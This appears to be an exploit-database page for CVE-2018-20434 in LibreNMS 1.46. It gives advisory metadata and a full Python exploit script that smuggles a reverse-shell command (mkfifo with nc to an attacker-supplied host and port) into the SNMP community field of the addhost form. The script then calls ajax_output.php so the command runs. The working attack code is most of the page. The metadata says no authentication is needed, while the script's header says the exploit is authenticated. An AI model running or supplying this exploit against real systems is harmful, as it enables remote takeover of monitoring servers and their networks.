LibreNMS 1.46 addhost Remote Code Execution

2019.06.28
Credit: Askar
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/python ''' # Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution # Date: 24/12/2018 # Exploit Author: Askar (@mohammadaskar2) # CVE : CVE-2018-20434 # Vendor Homepage: https://www.librenms.org/ # Version: v1.46 # Tested on: Ubuntu 18.04 / PHP 7.2.10 ''' import requests from urllib import urlencode import sys if len(sys.argv) != 5: print "[!] Usage : ./exploit.py http://www.example.com cookies rhost rport" sys.exit(0) # target (user input) target = sys.argv[1] # cookies (user input) raw_cookies = sys.argv[2] # remote host to connect to rhost = sys.argv[3] # remote port to connect to rport = sys.argv[4] # hostname to use (change it if you want) hostname = "dummydevice" # payload to create reverse shell payload = "'$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f) #".format(rhost, rport) # request headers headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101" } # request cookies cookies = {} for cookie in raw_cookies.split(";"): # print cookie c = cookie.split("=") cookies[c[0]] = c[1] def create_new_device(url): raw_request = { "hostname": hostname, "snmp": "on", "sysName": "", "hardware": "", "os": "", "snmpver": "v2c", "os_id": "", "port": "", "transport": "udp", "port_assoc_mode": "ifIndex", "community": payload, "authlevel": "noAuthNoPriv", "authname": "", "authpass": "", "cryptopass": "", "authalgo": "MD5", "cryptoalgo": "AES", "force_add": "on", "Submit": "" } full_url = url + "/addhost/" request_body = urlencode(raw_request) # send the device creation request request = requests.post( full_url, data=request_body, cookies=cookies, headers=headers ) text = request.text if "Device added" in text: print "[+] Device Created Sucssfully" return True else: print "[-] Cannot Create Device" return False def request_exploit(url): params = { "id": "capture", "format": "text", "type": "snmpwalk", "hostname": hostname } # send the payload call request = requests.get(url + "/ajax_output.php", params=params, headers=headers, cookies=cookies ) text = request.text if rhost in text: print "[+] Done, check your nc !" if create_new_device(target): request_exploit(target)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top